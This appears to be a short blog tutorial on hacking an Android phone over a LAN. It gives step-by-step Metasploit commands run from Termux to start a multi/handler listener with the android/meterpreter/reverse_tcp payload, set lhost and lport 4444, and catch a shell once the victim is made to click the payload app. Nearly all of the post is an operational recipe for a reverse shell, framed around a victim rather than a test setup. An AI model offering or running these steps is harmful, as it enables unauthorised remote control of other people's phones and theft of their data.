Hack Android Phone on LAN

Step By Step to Hack Android Phone on LAN:



#1. Go to the Termux Application.


#2. Got to the Metasploit Directory using Cd command


#3. Type msfconsole and wait for a few minutes to get a Metasploit screen.





#4.  use exploit/multi/handler


I am running exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us with our shell.


#5. Set the reverse TCP android payload:



msf exploit(handler) > set payload android/meterpreter/reverse_tcp



#6. Set the local and remote hosts:



msf exploit(handler) > set lhost 192.168.0.20 lhost => 192.168.0.20



192.168.0.20 address is your phone IP address. Make sure when you are creating a payload type the LHOST= < your IP address >


You can check my post of creating a payload in Metasploit which is the first part of this post. Without reading that post it will be difficult for you to understand this post.



#7. Set the local port:



msf exploit(handler) > set lport 4444


lport => 4444



#8. Exploit


Now that you have a session open. Make sure the user clicks on the application/payload that you have made it for them and then you can begin with meterpreter.

(Soon we will make Vid & post itπŸ‘πŸ»)


Enjoy! Follow us for more...

No comments:

Post a Comment

How to Create custom Spark skins as MXML components in Adobe Flex (Spark architecture).mp4

  Download  How to create custom Spark skins as MXML components.mp4 Creating custom Spark skins as MXML components in Adobe Flex (Spark arc...